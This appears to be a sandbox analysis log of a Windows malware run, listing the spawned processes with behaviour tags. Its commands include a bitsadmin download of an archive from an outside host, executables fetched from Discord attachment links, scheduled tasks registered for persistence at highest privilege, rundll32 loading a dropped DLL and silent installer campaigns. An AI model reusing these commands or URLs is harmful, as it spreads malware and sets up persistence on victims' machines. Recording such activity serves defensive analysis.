C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3068 /prefetch:24⤵PID:9976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:14⤵PID:14296
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:14⤵PID:14792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1512 /prefetch:14⤵PID:15016
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:14⤵PID:15160
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:14⤵PID:15192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2020 /prefetch:14⤵PID:17528
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:14⤵PID:17780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:14⤵PID:7556
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:14⤵PID:8740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:14⤵PID:3628
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:14⤵PID:8312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad3⤵PID:14840
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵PID:14864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514833⤵PID:8300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵PID:8224
-
C:\Users\Admin\AppData\Local\Temp\1b-051a9-cbb-75aa8-9f5e64719a71b\Waetojunete.exe"C:\Users\Admin\AppData\Local\Temp\1b-051a9-cbb-75aa8-9f5e64719a71b\Waetojunete.exe"2⤵PID:6604
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exe /eufive & exit3⤵PID:8080
-
C:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exe /eufive4⤵PID:2012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7836 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exe /qn CAMPAIGN="654" & exit3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exeC:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exe /qn CAMPAIGN="654"4⤵PID:4472
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exe & exit3⤵PID:8056
-
C:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exeC:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exe4⤵PID:8324
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exe /mixfive & exit3⤵PID:8452
-
C:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exe /mixfive4⤵PID:8828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8828 -s 2565⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exe /S & exit3⤵PID:8932
-
C:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exe /S4⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:9028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:10236
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:14044
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:15324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:16432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:17700
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵PID:18796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
- Checks for any installed AV software in registry
PID:6644 -
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z5⤵
- Download via BitsAdmin
PID:5360
-
C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"1⤵PID:6476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3948 -ip 39481⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6732 -ip 67321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3384 -ip 33841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 2041⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6708 -ip 67081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5740 -ip 57401⤵PID:6780
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\A8EA.bat "C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe""1⤵PID:6744
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""2⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""2⤵PID:2488
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "" "" "" "" "" "" "" "" ""2⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\29765\Transmissibility.exeTransmissibility.exe2⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\29765\18.exe18.exe2⤵PID:5072
-
C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"1⤵PID:6732
-
C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4208 -ip 42081⤵PID:6444
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"1⤵
- Suspicious behavior: SetClipboardViewer
PID:7104
-
C:\Users\Admin\AppData\Local\Temp\84B1.exeC:\Users\Admin\AppData\Local\Temp\84B1.exe1⤵
- Suspicious use of SetThreadContext
PID:5884 -
C:\Users\Admin\AppData\Local\Temp\84B1.exeC:\Users\Admin\AppData\Local\Temp\84B1.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3060 -ip 30601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7248 -ip 72481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1332 -ip 13321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-67GKE.tmp\Gy4Fi8em_KLp3z6GEiMCww2A.tmp"C:\Users\Admin\AppData\Local\Temp\is-67GKE.tmp\Gy4Fi8em_KLp3z6GEiMCww2A.tmp" /SL5="$303EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"1⤵
- Loads dropped DLL
PID:8156 -
C:\Users\Admin\AppData\Local\Temp\is-KOM9D.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-KOM9D.tmp\DYbALA.exe" /S /UID=27092⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\WYRKBQWKUB\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\WYRKBQWKUB\foldershare.exe" /VERYSILENT3⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2860 -
C:\Users\Admin\AppData\Local\Temp\91-e9c59-dad-64ea1-4dd2c9217edf3\Pebaefaewexae.exe"C:\Users\Admin\AppData\Local\Temp\91-e9c59-dad-64ea1-4dd2c9217edf3\Pebaefaewexae.exe"3⤵PID:7060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:7580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵PID:8236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:17340
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵PID:17372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵PID:8412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵PID:8636
-
C:\Users\Admin\AppData\Local\Temp\ed-ce543-d59-5abb5-287644db3efbd\Taejofutupa.exe"C:\Users\Admin\AppData\Local\Temp\ed-ce543-d59-5abb5-287644db3efbd\Taejofutupa.exe"3⤵PID:3400
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exe /eufive & exit4⤵PID:15960
-
C:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exe /eufive5⤵PID:19192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19192 -s 2526⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:18912
-
C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exeC:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe /qn CAMPAIGN="654"5⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:19280 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658223 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
- Enumerates connected drives
PID:9304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exe & exit4⤵PID:18964
-
C:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exeC:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exe5⤵PID:19396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exe /mixfive & exit4⤵PID:19200
-
C:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exe /mixfive5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exe /S & exit4⤵PID:19364
-
C:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exe /S5⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:2204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:8888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:11752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:14516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:15620
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:16488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵PID:17644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
- Checks for any installed AV software in registry
PID:18620 -
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
PID:5612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7256 -ip 72561⤵PID:7792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3716 -ip 37161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Transmissibility" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\29765\18\Transmissibility.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7272
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e58bda179b647d8612e48a6ef749c3a3 wz+93ybZOUOarTGSQyPF/Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:7212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "8884366" /sc ONLOGON /tr "'C:\Boot\en-US\8884366.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cutm3" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\Uninstall\cutm3.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2544
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:7120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 4562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3860
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7120 -ip 71201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "x5yjjKUdFt2OAlDQL7_fYMPj" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9\x5yjjKUdFt2OAlDQL7_fYMPj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4820
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6232 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
